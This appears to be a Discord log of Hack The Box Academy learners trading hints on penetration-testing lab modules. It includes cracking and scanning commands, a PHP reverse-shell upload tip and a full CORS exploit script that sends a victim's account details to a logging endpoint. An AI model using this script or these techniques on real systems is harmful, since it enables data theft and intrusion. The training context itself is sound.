#modules
1 messages · Page 524 of 1
I'm on EU 1, EU2 kept giving me time-outs
EU 2 gives more info:
PING 10.129.225.46 (10.129.225.46) 56(84) bytes of data.
From 10.10.16.1 icmp_seq=1 Destination Host Unreachable
DM me
Hello!
I am currently stuck on the Skills Assessment of SQLMAP Essentials.
I have already found the issue with the user-agent. Unfortunately I can’t get any further. Probably missing the correct tamper script...
Thanks for any help.
Try using a popular tamper script maybe?
What command did you try?
Hi, I am working on the PowerView module, I am stuck on this question " Find the member of the Remote Management Users group on WS01." There are no users on Remote Management group to be associated with WS01. Can anyone give me a nudge ?
Ok, now I've started Windows Privilege Escalation Skills Assessment Part I and got a foothold, but running lazagne, juicypotato and printspoofer don't work. Any hint for the ldapadmin password and the priv esc questions?
Can anyone provide a nudge on Broken Authentication - Skills Assessment?
I managed to ||login as support.us|| I have also discovered that the ||token is two MD5 hashes separated by a colon|| but I am not sure what to do from here on out...
@naive ravine crack those md5 hashes and see the format they use, maybe you can abuse it
Hi everyone, I’m new in HTB. Yesterday I was trying to finish the first “practice” of the metasploit module but I’ve got stuck.
I was doing as follows: msfconsole, search eternalromance, use 0 (the correct one), and set RHOSTS (I’ve set the right one). All was running well but I didn’t get the shell, and I think it’s because the LHOST is pointing to the local IP, not the VPN. How can I set the VPN instead of my local IP? In the openvpn file I have the private key, and the public (I think, but not the IP). I would appreciate any help
you can either check the ipv4 of your vpn with ip a. The vpn is usually tun0. Or you can set lhost straight to tun0
Thanks, I will try!
It worked
Hi again, I’m a little clumsy 😅 I’m trying to find the flag.txt on the windows desktop but I can’t make it. I’ve typed whoami and got nt authority\system. If I do a cd desktop or C:\Users\authority\Desktop I can’t get to the desktop
afaik, nt authority\system is always named Administrator on windows
Check the C:\Users with dir command.
Ok… found it. cd C:\Users\Administrator\Desktop.
But now, when I type flag.txt and enter, nothing happens.
Somebody else had the same problem?
Wow man, I’m soooo clumsy. type flag.txt and done😅
Anyone available for Windows Priv Esc Skills part I ? After getting foothold?
Think they changed the box, been working that crap for 3 days now
jarednexgent recommended running printnightmare which is another priv escalation tool he said worked for him, had not tried it yet but fixing to
Awesome, I'll go give that a try rn!
and ya it's a feature of the box not an error. It's got a firewall that drops ping requests
if you find anything let me know too, I'm working on the same things as you are right now
You need to be auth. I still have no creds... !
hey, did anyone else solve this?
I did
What am I doing wrong? I get NTSTATUS: STATUS_LOGON_FAILURE no matter what I do.
you can dm me
Module: Pivoting
Section: Netsh.exe
Problem:
Set up the port forward with netsh.exe using an admin powershell. All looks to be working, but the victor credentials are rejected as incorrect.
I tried xfreerdp and rdesktop with no success.
Also tried specifying the domain as inlanefreight.local, but then get the following error:
"We can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential you can sign in with the credential."
Oh, and I've confirmed the proxy is set up by a quick nmap from attackbox to pivot host which returns a http proxy on the port.
Does anyone have any advice for Password Attacks: credential hunting in Linux? I've tried brute forcing multiple services, but so far no luck.
Try changing the VPN you are connected to. You can find VPN settings in your Academy account. Feel free to DM me if this issue persists.
can someone spare the time to help me with a question? I've been stuck on Broken Authentication - Reset Token for some time now and I feel like I'm going bonkers, I'm sure my script is wrong... was wondering if somebody can point me in the right direction 🙂
Hello, I am trying to get the 5th flag on Linux Privilege Escalation Skills Assessment. I upgraded my shell using the python 3 command, but I am still unable to execute the command to escalate my privileges. Can anyone assist me?
Module: Pivoting
Section: RDP and Socks
Problem:
I am able to get the SocksOverRDP .zip onto the host, and I then expand the .zip and find the .exe and .dll. Then I run the regsvr32.exe, and get an error about the dll not existing, and look again and the DLL has disappeared...print out from cmd below:
UPDATE to the above: Defender is your enemy
wow question was sorta misleading, I spent an embarrassing amount of time trying to figure out what the role was
spoiler alert
Hi, I'm doing the File Inclusion module now and am on the Remote File Inclusion section. I can't answer the question at the bottom of the page because the container isn't giving me a port, just an IP. No response from ping, nothing on port 80... Bit stuck and I've tried respawning it a bunch of times
hey guys, in the Modules section of the Using Metasploit module, I've got a shell but how do I get the flag file off of the admin's desktop?
Search via meterpreter
Read this, it helps : https://www.offensive-security.com/metasploit-unleashed/searching-content/
Or directly drop into an interactive shell, and then conduct your search
thanks, I did search -f flag.txt and got a path, just gonna cd to it now and open
anyone available to help me on the pivoting skills assessment??
Hey everyone
Question
On Information Gathering - Web Edition , Section is Active Subdomain Enumeration
It asks me this 10.129.69.147
- 1 Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
But I can't do anything with that. I have put inlanefreight.htb in /etc/hosts but still can't do anything with this
I'm really unfamiliar with 'awk', can someone help me create a set of rules to modify a password text file with the following rules: start with capital
One lowercase
end with digit
The password must contain at least one special char: $ # @
20+ Characters, less than 29
Hi, Guys. Hope you are having a wonderful day! I would like to get some help with "Password Attacks - Password Mutations" Task. Thank you
In the Attacking Common Services module, Attacking RDP, question 2 is something wrong? I wrote the key but I get an error. (As you can see I answered the other questions)
Any nudge on the Broken Authentication Skill Assessment, do I really need to parse the 'more than 20, less than 30, starts with capital letter, ends with number' passwords from the recommended Rockyou.txt file? I'm attempting to do this, but could use some help on it, or know if I'm completely off the track
that question is asking for the key name not the key path
I also wrote just the key name. Also error
hi! i need some help with broken authentication module. DM me please.
I'm having the same problem. Have you been able to solve it by any chance?
@tiny ledge yes we will need to filter the rockyou.txt file to find the password for the support.xx user
@agile bloom have you followed the directions on GTFOBins for busctl?
@fair cove try doing a zone transfer with dig axfr . If you need help feel free to DM 🙂
i'm on the windows fundamentals skills assessment. i'm literally looking at the SID of the security group i made and it's saying error
Ah thanks mate. Just wanted to see if I had done anything wrong with my etc hosts
i can't find a video walkthrough for this part and i'm baffled
@quiet prism DM me
added
hi, can anyone help me at sqlmap essentials at : Running SQLMap on an HTTP Request, question 2?
DM me
With your attempts on the matter
hi all. just started doing modules. excited about it but now that i'm older my cli font size is its own security hazard. everyone can read it
any idea what's wrong? htb says my vpn is connected, the machine is active but when i go to nmap says host is down
@west canopy yes I think so, can I DM you?
I have the directions but am not sure if I am following them correctly
hi , how did you manage to solve this ?
I didn't get it solved. I tried changing VPNs but it didn't work. I just left it and moved on in the hope it would start working in the future. I noticed the machines had updates which needed to be applied so thought perhaps there were some updates to be pushed?
How do I brute force in the Broken Authentication module? All the word lists shown are not something I've ever worked with
Hi , how did you manage to solve this ? it's something extra beside following the steps
anybody knows how to make money online
... Can you not spam the same question everywhere, especially when it's unrelated to this discord
Yep feel free to DM 🙂
Anyone able to give a little hint/help on the Footprinting: Hard Lab? I feel like I'm in. But I can't seem to escalate after getting ssh access :/
@trail pendant try connecting to the local mysql database 🙂
Anyone here that finished the Web Attacks final Skills assessment? I found the ||event create function|| but literally every XXE attempt I do fails to reconnect to my local web server instance.
@rustic sage Try utilizing the technique shown in the middle of the "Local File Disclosure" section to read flag.php. If you get stuck feel free to DM 🙂
I'm having a little trouble on the AD Enum & Attacks Skill Assessment I. I was able to get the first 2 tasks pretty easily but now i'm kind of just stumped on how to get the users PW. Might just need to take a brain break, but any assistance or point in the right direction would be appreciated
Hello, I'm currently in the academy module SQLI, I managed to read everything inside the database, but I don't understand the question.
do I have to look for a user in a table whose username is 'user()'?
@buoyant escarp user() is a variable in the database. Try doing something like this but replace @@version with user():
ah to get the login name for the database itself?
Yes i believe it shows who is currently logged into the database
got it thx
@timber tide Try using PowerView to obtain the kerberos hash for the user, and then crack it with hashcat. For example:
I was trying that but PowerView isn't available on the webshell, or at least I can't find it? I tried to upload it but it crashes the webshell
when the backend is using php and mysql, and I use the # comment, basically "....QUERY..." I have to set ";# so the string in php is not broken, right?
Q.When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag(second last section on skills assessment).
Module : Login Brute Forcing
So I brute forced the given IP after a google search revealed a GET method
Got the credentials and tried logging in with:
"ssh" however get this error ssh: connect to host 167.71.142.156 port 30930: Connection refused
"ftp" however get an inescapable terminal with no commands recognized
"curl" Doesn't give any results
"Firefox" Doesn't give any results.
If someone can tell me where I'm going wrong, I would appreciate it.
Can anyone offer me some help with SQLMAP essentials? I am having issues with Case #9 and trying to get past the UID wep app protection
nevermind I figured it out lol
@timber tide You will want to find a way to get a terminal based shell to progress further through the assessment.
@carmine lark DM me 🙂
Thank you, yeah that makes too much sense 🤣
Hello, I'm currently in INFORMATION GATHERING - WEB EDITION/Active Subdomain Enumeration, I have a problem with the question about TXT, I use dig and nslookup and also tried the commands in the cheat sheet, can anybody help me please
Hi all, still having issues on the "pivoting" skills assessment. Anyone able to help?
Is it just me or doesn’t it make sense to have module specific channels under academy heading?….@ the mods
guys. what is the wordpress simple backup plugin vulnerability
I just spent 3 hours and got nothing
@mystic edge is this for the Getting Started module? You want to use the wp_simple_backup_file_read exploit , and in the options set FILEPATH to /flag.txt
Burp is such a fkn garbage, stop teaching ppl burp, stop doing modules with burp, just stop ffs
Hi guys, why can’t I attach files? The plus button on the left is greyed out and does not prompt anything when pressed
It's an ongoing competition, please respect and read the rules. 3rd party exchanging / seeking help is prohibited and a disqualification offence
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
you mean 18 above cant upload?
hi, anyone had any clue on this question in the htb brute force module? "Once you ssh in, try brute forcing the FTP login for the other user. You should find another flag in their home directory. What is the flag?" the other user I found was m.gates, however after generating wordlists using cupp with first name Melinda, lastname gates, nickname ann, the brute force attempt using the wordlist wasn't successful, any directions or clue? hope for any help from y'all
@steep oxide Try running hydra from INSIDE the target machine (after you've SSH'd in.) There is a rockyou-10.txt wordlist there for you to use 🙂
@west canopy thanks for the clue...brute force machine within another machine is slow as hell😅
everyone here sir pls I need some help can anyone help me pls I am in a big trouble
call the police?
no sir I need a pro hacker to solve this problem trust me I am in a big trouble and idk how to fix it
pls sir help me🙏
🥲
doubtful, this isn't a discord to hire hackers, anything illegal will get you banned
go to the police
then go ask discord's support
not working sir pls sir you guys my last hope I tried everything
no it's over, you already did everything, that means it's impossible
🥲
yes let's hear it
just sir atleast try
🙂
well there was a girl who was a friend of mine, I forgot her name. she gave me a link where she told me like "my brother made this game, can you try it". I clicked and she took my account and she took my friends' accounts and most people think I did it, and my old account had nitro. that's it sir
I did not working sir
what you're asking for is ILLEGAL and this is me asking you for the last time to drop it
thank you
so sir what should I do?
but sir the way she tricked me and took my acc that is more illegal
You can contact Discord for help and support issues through email at support@discordapp.com, via Twitter, or through various means within their help department.
so will it work sir?
but only one problem I forgot my old acc password💀
Can someone point me in the right direction on Broken Authentication Skills Assessment?
Do you know the password policy yet?
Read the page "messages.php" carefully.
If you keep getting stuck, write me a DM
What you fell to was a worm that utilizes discord, her account was already compromised when the message arrived to you that got your account. There are multiple versions of the "can you test this game" worm all working on the same principle on discord rn.
And yes very illegal
But for the guy who originally wrote the program
And deployed it
Windows Privilege Escalation -> Miscellaneous Techniques
I got the SYSTEM privileges, but it's not clear in the question what exactly it expects? The question there is "Using the techniques in this section, find the cleartext password for an account on the target host."
What account exactly?
I run lazagne, got all the dump with hashes for all users
nevermind, I've found one
hint for other: re-read the module again and again, the hint is there
dm if you still need help
quick question, does vhost always share the same ip?
Thanks very much, but I sorted it...was working off some spurious ping sweep results.
Hey guys
I need help in the Linux privilege escalation module, at the cron jobs part. I modified the backup.sh file and opened a netcat but no response. When I’m trying to open the backup file it says permission denied...
Anyone?
I’m somewhat stuck on Password Attacks - Medium, I have an SSH session on one of the users, tried looking for credentials, cronjobs, backups, accessing the mysql db, brute forcing other users via SSH but they all seem like dead ends. Is anyone able to point me in the right direction?
I am stuck in the same place for 3 days now. I tried everything you tried and also checked logs, scripts, the other IP from the .doc file and looked for vulnerabilities in smb (found a bunch of users with the same pass) but no working results. Feel like giving up... 😞 Can someone give just a hint?
dm
dm
Hi, I'm new to HTB and HTB Academy. I want to learn pentesting on HTB Academy. With little IT knowledge, is there a list of modules to go through in order to go from zero-to-hero?
I desire an ordered list.
Hey, im a bit stuck with the file upload attacks skill assessment, could anyone help point me in the right direction?
Has anyone had weird problems with the meterpreter section of the metasploit module? The target's "time left" seems to go down waaay faster than it should. Like, it'll say 80 minutes then like 10 minutes later it's expired. The box itself also doesn't seem to want to play well
need some assistance with the medium lab of footprinting. I have managed to get logged in via RDP and found the credentials for what I thought was the sql database but not getting logged in.
dm me and I can help
There is another user on the system 😉
yes alex and Administrator
Exactly. The user Alex has no rights to access the database. So try it with the other user.
damn you know about this thing so can you help me
There is nothing that can be done
Discord support will help you
i need help with the skill assessment of broken authentication 😐
DM me
are you still stuck on this question?
Which WAF is being used? (Format: <name>)
I'm doing the osint and I couldn't see it in the source of inlanefreight.com so I tried to use Nmap to find it but I couldn't make it work. What tool should I use to find it?
could try wafw00f?
@limpid wharf it's on the front page of the website, top left hand corner. "Protected By Wxxxxxxxe"
I think it might show up on Wappalyzer as well
wow im the worst at osint haha wtf
thank you !!
lol np 🙂
Facing the same issue now
Damn didn't know this behaviour existed, maybe contact htb site support,
anyone finished the LFI module?
I'm currently doing the automated scanning section and using ffuf to enumerate parameters on the target but I can't seem to find it. the payload used was - ffuf -w /root/wordlists/parameters.txt:FUZZ -u 'http://<serverip>:<port>/index.php?FUZZ=value' -fs 2287
is there any error in the payload or am I missing something?
it will be in demand for a decent amount of time
demand is too high and the supply is very low
Good idea!
can any1 help with js code
Probably even more than now, we are moving more and more into technology, meaning more people will try to take advantage of it, so probably.
To be fair it’s probably going to be less in demand because more people are going to do it 👀
what is the problem
I guess if you can do it good there is nothing to worry about
bruuuuuuuuuuuuhhhhhhhhh
Lol
yes
I tried to do c++ once, I had no experience with coding
It was a nightmare
thanks man
yeah
Why is it disgusting
Hm true
Nonetheless, its needed for a lot of triple a games
Which makes it in demand
I actually know one person who started coding with c and he gave up in 1 week
:DDDDD
in the university of course
it was not his choice
I hated when secondary schools skipped python
They would teach people how to use variables then went on to html
God I despised creating websites
FAAAAAAACTS
:DDDDDDDD
Then I had to watch indians on youtube
They helped so much
I learnt everything in 10 minutes compared to the term of python at school
Have you worked on ffuf module yet?
not yet but i was assuming the payload htb supplied in the section should do the trick
Solves everything flawlessly in ffuf module, just to suffer on 1st question in skills assessment
I need help with the metasploit section Modules, I keep getting a message saying "Exploit completed, but no session was created"
if you still need help, write me a DM
if anyone can assist with the web attacks skill assessment please pm
do i have a problem if i tried it 12 times now?
how the hell do I set up this machine with openvpn?
I am using linux and I want to set up this openvpn
@rustic sage is it possible you aren't using the right exploit?
very possible, I don't know what I should be using TBH, I just follow the Hack The Box sections
openvpn yourusername.ovpn this is the first command, should I put my username from the web or pc?
it's harder than you think, I am dyslexic
Hello
sudo openvpn <vpn_file>
Why am I not allowed to send pics
verify yourself
what is the right one if i may ask?
What section are you on?
Modules in METASPLOIT FRAMEWORK
Try using ||ms17_010_psexec|| if you haven't already
i have
did you set the LHOST and RHOST?
yep
that's all it needs
In the Web Proxies Module, particularly in BurpSuite Fuzzing. I have put a generic .html list as an input for the intruder but there's no answer at all. Can anyone help me on the steps on how to find the flag of that problem?
By no answer, I mean error 404 all the way
dm me
I'm stuck on question#2 of the Predictable Reset Token module. Can someone give me a nudge?
I've decoded the password reset token for the htbuser, but I'm not sure how this will help me login as the htbadmin user?
Hello, I'm currently in INFORMATION GATHERING - WEB EDITION/Active Subdomain Enumeration, I have a problem with the question about TXT, I use dig and nslookup and also tried the commands in the cheat sheet, can anybody help me please
dm me ill give you a nudge
did you find all of the subdomain?
I’m on the Stack-Based Buffer Overflows on Linux x86 module and the Skills Assessment is giving me a headache. I’m making a payload using msfvenom and putting that into the python run command in gdb. But when I cat msg.txt, it doesn’t show me the flag as I would expect, instead having a bunch of arbitrary characters.
yes , I try host
Note: I’m using the read_file payload and not a reverse shell payload. Thought it took too much effort.
I mean did you find all of the subdomains for inlanefreight.htb, ||the flag is in one of the subdomain txt records||
yes and is not the flag
just dm me
Attacking common services module
SQL section
Unable to login with the provided credentials. Any pointers would be very appreciated! I keep getting "the login is from an untrusted domain and cannot be used with Integrated authentication"
hi can someone give a hint about Password attack Medium lab i have ssh session but i cant find any creds
hey guys. I have been trying to exploit CORS and I bypassed the origin by using this method:
Origin:https://vulnerabile-website.com
Origin:https://mylink-to-redirect-the-wite.com
I added a second origin to bypass it, and it worked.
but here is the problem. I wanna exploit it by javascript, and this is the normal exploit:
<html>
<body>
<script>
    var xhr = new XMLHttpRequest();
    var url = "https://ac211f241efad372c645255700030006.web-security-academy.net"
    xhr.onreadystatechange = function() {
        if (xhr.readyState == XMLHttpRequest.DONE){
            fetch("/log?key" + xhr.responseText)
        }
    }
    xhr.open('GET', url+ "/accountDetails",true);
    xhr.withCredentials = true;
    xhr.send(null)
    alert(xhr)
</script>
</body>
</html>
but as you can see there is only one origin request listed here. but how can I send the second one to use the method I used above, here?
I can't just write the source twice. I need it to be in one request, not two!
are you logged in with ||dennis|| via ssh? if so ||check his ssh key, it can be used for something else||
no I'm still in the j user, I can't find any creds for dennis
ohh check what service is running on that box
um hey guys quick question
im doing a module on metasploit and when i launch the target it's not even able to ping it, is that normal?
cant access the webpage either
Try to reset the target
And then troubleshoot any network issues
can i dm;
Pings would be disabled from target host, so try nmap with -Pn switch to quickly check for host availability and port too. Next thing is, there maybe non-standard ports. Leave no stone unturned
sure
okay so my network is fine, when i go to the webapp the browser is unable to connect, nmap scan with -Pn just stays blank
https://academy.hackthebox.com/module/57/section/516 in the first question, what is the name of employee
Hi all! I'm having troubles with ZAP's hud. When I try to do the hud tutorial or just follow along to the modules in general, I can't use any of the functionality of the hud what-so-ever. This is true for both my local vm of parrotOS and the pwnbox on academy. Has anyone had the same problem and perhaps have a solution?
Thanks! 🙂
Try to identify the open ports and then connect to it. If everything tried fails then take rest / break and come back to it later. Once you're back to it and still fail then contact HTB support from that chat box icon
yea i left came back and it takes pings now so i assume its up , many thanks
Hey I was doing the Web Proxy module and inside of that ZAP Scanner, I was supposed to find a flag which can be using the ZAP Active Scanner as a remote code injection.
I had to delete a space at the end of my flag for it to accept it.
Oh yeah I got it as well
have you done the skills assessment thing at the end of the module?
@white mulch I'm doing that now actually
I'm stuck actually
We don't/can't do that here
Guys, I'm trying to download the file winPEASx64.exe for windows privilege escalation but all of my browsers refuse to download it, thinking there's a virus in it. I then tried to download it using the command line with wget but I still have the same message that it potentially contains a virus
I haven't tried the module yet, but maybe you can upload the bat file?
It is in the StartingPoint - Archetype, so technically not a module of the academy
hello guys
I am doing the login brute forcing module, and it is the first page of the skills assessment... I managed to get the first flag, but when I am trying to brute force the admin_login.php I am getting a lot of username and password matches, but none of them seem to work... could someone give me a clue?
Then your hydra command is probably not correct.
You can DM me if you need help.
I'm stuck on the SMB practical in the attacking common services module -- I can't find the wordlist it's referring to
Hi guys, I'm currently working on Attacking web applications with ffuf. I'm trying to get the parameters that would be accepted on a page but after fuzzing I get no hits, any help will be appreciated!
delete the flag plz
Hey All, i'm stuck at the AD Enumeration & Attacks skills assessment 1 - Getting the flag on the Administrator desktop on MS01. I pulled the user accounts from the WEB box and attempted to crack their hashes, only the user in the previous questions was cracked. I'm stumped on how to access or get a shell on MS01. Any push in the right direction would be appreciated
No mate managed to get through. Thanks for checking!
dm
you can DM me
What question exactly are you on?
Hello, i am very new to hacking and i recently decided that i wanted to do one. And i haven't found any tutorials on how i can learn to do that. If anyone here can help me i would appreciate!
For Footprinting SMTP module, would smtp-user-enum be the intended tool to enumerate the users? I'm using that, but is there a more efficient way or a different intended way to find the username on the system?
How you did not find tutorials?
Have a look around on Youtube.
IppSec, The Cyber Mentor, Jhaddix, NetworkChuck, David Bombal, John Hammond and these are just a few that come to mind off the top of my head.
Oh, thank you payload!
Yes, you can find the user with smtp-user-enum.
I wonder if there are better ways? No idea. smtp-user-enum has led to the goal.
and take a look at the Starting Point.
https://help.hackthebox.com/en/articles/6007919-introduction-to-starting-point
Let's get started with Starting Point.
Thank you.
the perfect tag
thanks anyway youknowwho
Could I have some help on the wordpress skill assessment???
Sure, where are you stuck? You can write me a DM
I mostly am just confused on what vulns to exploit.
I have been reading POC's from wpscan and I need a little nudge
Have you performed a WPScan with token? Then it should show you a plugin that is vulnerable.
YEs. I have been using my own api token.
There are just lots of vulnerabilities in the plugins
Nvm. Give me a sec
I will try a little bit more on my own
I think I found something
@acoustic owl hey
Hi
Can someone please help me with Question # 2 in Bruteforcing Cookies?
The lesson implies that we should use CyberChef and/or Wikipedia's list of File Signatures to solve this, but it's not clear how we actually ID the encoding method used. Are we supposed to randomly apply recipes to the token in CyberChef and hope to get lucky? Also the Decodify tool can't crack it, and the token seems too long and complex for JohnTheRipper to work in a reasonable amount of time...
Can i ask something?
sure
I want to start hacking from start can u guide me please?
Is Berlin your home? Then we can speak German.
No, am just the fan of berlin character in Money Heist 😅
My way led me via Udemy (networking, Linux, Python, web development) to TryHackMe and from there here to the Academy.
Get familiar with linux command line first
Get familiar with how web apps work
Get familiar with Active Directory
Get familiar with Networking
Then Do HTB academy
Ok, Thanks
If you need any tips @rustic sage you can dm
man i feel overwhelmed just thinking about it
I have no college experience or industry experience so this stuff can be a little rough!
Yea the amount of stuff you need to know just to get started is massive. And all of that is barely scratching the surface.
That is unfortunately the case. Although, I've always enjoyed learning new things so far.
If I want to specialize in pentesting a business, what should I focus on?
I think Active Directory should play a pretty big role. Take a look at OSCP. This is an exam that is often required.
If I complete the pentest path, will I be ready to do the OSCP?
No idea. I think it needs more for the OSCP.
My goal currently is to complete the Jr. Pentester path and then the Active Directory path.
After that I would like to do a few Pro Labs.
Maybe there is someone here who has the OSCP and can tell you more about it.
Hello everyone, a little confused on Getting Started: Nibbles - Initial Foothold. I am having issues translating what I am supposed to do in the lesson to the actual Pwnbox. Any hints would be greatly appreciated. Took 3 days off so a little rusty on where I am at
@ebon pine we want to upload a file to "My Image" but it's actually a php script containing a reverse shell
so just to make sure; go into Sublime Text or something similar, put the below from the cheat sheet in with the appropriate ip, save it as a .php file and upload
yep , will just need to change the IP address and port to match your machine
my apologies, and I really appreciate you helping out; am I matching my machine in that or the target machine and how do i ensure I am putting the port;
would it be more appropriate to Dm you?
your machine, not the target machine. A reverse shell will make the target machine connect back to you (which is why we provide our own IP and port)
np 🙂
I'm stuck on the second question of weak brute force protections in the broken authentication module, could anyone give me a push in the right direction?
nevermind, i got it
Hey guys, can I get a nudge on getting the admin email for the imap/pop3 section of the footprinting module.
I've connected to the imap and pop3 servers with both curl and openssl s_client with the user robin, and using list and stat has shown that robin has no emails in INBOX as well as the DEV box. I have some usernames that I verified during the smtp section before which can be the admin user, so am I to use the verified usernames and bruteforce the password? Or does robin's email server contain a message that I haven't been able to find?
My current guess is it has something to do with the capabilities
Just reading through some of the RFCs
Could I please have some help with Password Attacks: credential hunting in Linux? I think I need to brute force ftp or ssh, but when I do I don't find a valid login. I've tried both files from the resources section and kira as the username with the password file as the one from the resource section.
Took a break, came back, and now I can see TAG "1" UID. Now I guess it's time to dive into a vid about imap/pop commands
@pine cargo yes the imap commands are pretty clunky. If you need help i might be able to assist so feel free to DM me 🙂
Thanks for the offer! Though I just got it, the imap list command should list if the box has any emails or not. I skipped the ||correct|| box since I thought it was empty and was in the impression that I was looking for the artifacts of a deleted email or draft or something
Now I'm just irritated I didn't find it sooner, seems so easy to find in hindsight
sweet! nice work !
How do I find the admin password of nibbleblog?
Any chance of a nudge for the "Attacking Common Services" medium skills assessment? Is it just a matter of brute forcing with the lists provided by the course?
The lists provided by the course will not help you.
You need to find a username and then bruteforce it with its own list.
Any hints on finding the username? I've tried enumerating pop3 manually but that won't work. I've also done a zone transfer but haven't found any reference to a user name on there...where should I look?
Do an Nmap scan. Is there a port that stands out? Take a closer look at this service.
The key is all ports. Thanks.
Why am I having so many issues with Active Subdomain Enumeration... Always NXDOMAIN and other errors... It's almost like I can't hit anything, but I can
Does anyone have the code to parse the password list for Broken Authentication - Skills Assessment, I cant figure out how to modify the rockyou list
You need to find out the password rules. Then apply the filters to the rockyou.txt list exactly as shown in the course.
I found the rules, but the rockyou.txt list is messed up as it is, with all the 'links', 'emails' etc. Even if I remove everything longer than let's say 29 characters, the links remain in the text file. Also if I apply capital letters to all the words, it somehow removes all the entries
Maybe you need to download a fresh rockyou.txt.
Actually it should not have links and emails in there
Doing the Vulnerability Assessment module. The VMs are insanely slow and disconnect all the time. Anyone else have this problem as well?
Thanks, I'll try this
hi guys, about the HTB hashcat module, hybrid mode section, question 'Crack the following hash: 978078e7845f2fb2e20399d9e80475bc1c275e06 using the mask ?d?s.'; I ran hashid on the hash and found the hash type to be 160, put the hash into hybrid_hash with nano, and used this command: hashcat -a 7 -m 160 hybrid_hash '/home/wilsonchuah/SecLists/Passwords/Leaked-Databases/rockyou.txt' but an error of "No hashes loaded" appears. Any clue where I went wrong?
@steep oxide your hash mode number is incorrect, it's not -m 160
I tried 100 as well for SHA1 and it didn't work either; for most of the other hash types I couldn't find the hash type numbers
Any tips on how to make changes with awk, so it deletes all entries where the last character is not a digit?
Though this didn't work, this is how you use a mask attack
Kinda confused that it didn't work, but I'm guessing that the mask isn't only ?d?s
I've got it working using this command: hashcat -a 6 -m 100 978078e7845f2fb2e20399d9e80475bc1c275e06 '/home/wilsonchuah/SecLists/Passwords/Leaked-Databases/rockyou.txt' '?d?s'
thanks anyways😀
lol, I've gone 9 ?a's long in bruteforcing
hashcat and password cracking are things where hackers benefit with a better system, either that or aws
awk '/[^a-z]$/ {print }' file
^This prints it into stdout
To make changes to file do
command > tmp && mv tmp file
This would delete original file
otherwise you could also redirect to a new file with
command > newfile
Nevermind, forget that,
awk has the -i feature
You can do
awk -i inplace '/[^a-z]$/ { print }' input
^Single command to modify the file
Hi all, I think I "cheated" on the common services hard lab. I managed to get system without using RDP at all and without taking over anyones account as is suggested by the second last question. If someone knows the "correct" solution for this box could you DM me and let me know?
I am stuck on "What does the Linux PAM acronym stand for?"
I found the answer
but the system keeps saying it is incorrect
:/
It doesn't have
and I found the answer
I was too formal
||Linux PAM stands for Linux Pluggable Authentication Modules||
instead of
||Pluggable Authentication Modules||
It worked
That was the correct answer
the "correct" solution is ||Impersonate a user in MSSQL||
Haha, I guess it was the intended way 💩
Hello, I have a problem with the File Inclusion Skills Assessment, all I get is "Invalid input detected". Does somebody have an idea what is wrong?
Need help on the FOOTPRINTING module - DNS section: Can’t brute force the host which ip end with 203
anyone here finished the lfi skills assessment?
Take the smallest list under Seclists
If you don't find anything, use the next bigger list
HTB Vulnerability Assessment. Nessus skills assessment.
Connected to Nessus and I can’t do anything. Any ideas? (Using workstation)
Yeah, dm if you want
Take a look at the source code (PHP)
On MySQL Essentials, in the OS Exploitation section, I have a problem with the second question. I can create an interactive OS shell but I can't find the other flag
hey guys, can anyone help me with File Upload Attacks > Type Filters? I get "image (link to the uploaded file) cannot be displayed because it contains errors"
Is it one of the subdomains-top1million lists? Or should I try the other ones?
The smallest list there contains 5000 entries. That is too much.
Try other lists
feel free to dm me if you are still stuck
There are only two wordlists under DNS that are smaller than 5000 and neither works… most other lists have way more than 100000 words
Have you found the zone?
I’ve done the zone transfers but there’s clearly something I’m missing since I don’t get how that’s related to the question I haven’t completed
hey guys, any of you encounter this when compiling zip2john , it says "fatal error: arch.h: No such file or directory", how do i solve this? i need it for the hashcat module question
ive got the zip2john.c file from here https://github.com/openwall/john/blob/bleeding-jumbo/src/zip2john.c
Did you get an answer to this? I'm at the Socks tunnelling section and those credentials are not working for me either...
@paper crag @shadow verge try it with the US 1 VPN
No need i have completed the module i was asking for someone asking for help
Any tips using ' sed ', I need to delete all the lines not containing a special character '$ # @'
I did not get answer to the problem, when I did the module everything was fine, so the Payloadbunnys solution, might work with you.
@acoustic owl can I DM you?
sure
You can DM me if you are still stuck.
hi everyone, I have a question about the module "Network Enumeration with Nmap"
sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0
this command is not working and I don't understand why.
this is the answer
setup_target: failed to determine route to 10.129.2.28
I completed that module and never needed anything that complex
do you have an IP assigned to tun0?
i'm curious for two reasons:
1- because i'm studying and I would like to understand
2- i'm stuck in the evasion medium lab and i'm trying to figure out the solution
yes, sure
dm me and lets discuss it more where we wont give anything away
ok thanks
Hello world !!
I have a problem with the intro to Network traffic analysis.
What addressing mechanism is used at the Link Layer of the TCP/IP model?
It's MAC but I can't validate this answer.
Can you help me ?
@vagrant latch DM me 🙂
Ok.
getting started
module
the "List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file."
I need help
I use the
smbclient -N -L \\\\<ip>
smbclient \\\\<ip>\\users
smbclient -U bob \\\\<ip>\\users
then I get the error "session setup failed: NT_STATUS_LOGON_FAILURE"
every fucking time
even restarted the IP address
multiple times
and followed the same process
after this? smbclient -U bob \\\\<ip>\\users
@pallid breach just tested on my end and I'm not experiencing issues. Your command looks correct.
it is...
Are you working from a VM or using pwnbox?
same thing as you
parrot os in vmware workstation
Try using the pwnbox, it's the built-in browser-based Parrot OS
thats what i just used now
too much fucking around and I already used the 1 instance for today
I once had a weird issue on Footprinting Medium Lab. I work from a kali VM and i could not transfer files off the SMB share that I had to access to finish the section.
but from Pwnbox it worked fine.
i use virtualbox
is it free?
ah ok
oracle vm virtualbox?
Yes
yep that's the one
how did you add the parrot os to it?
i don't use parrot , i just tested on the pwnbox. I use Kali from virtualbox
the in-browser parrot OS that you can spawn is the pwnbox
I am sick of this hacking thing
I'll do it tomorrow
@north rapids
gift him some NITRO
JAJAJAJAJA
I run Kali from a hyperv server on an enterprise network and rarely have issues with communication but every now and then (like 3 times) I have had to use the pwnbox to get something to work.
Actually its not bad, but to get the gui to work for RDP took some setting up. At my home I have a dedicated Dell poweredge server that I use, and I gotta say its so much faster that way lol
I only use it here because of course the memory and storage options are sooo much better on the hyperv server than my desktop
so do you have essentially a bare metal metal kali/parrot machine on your home server?
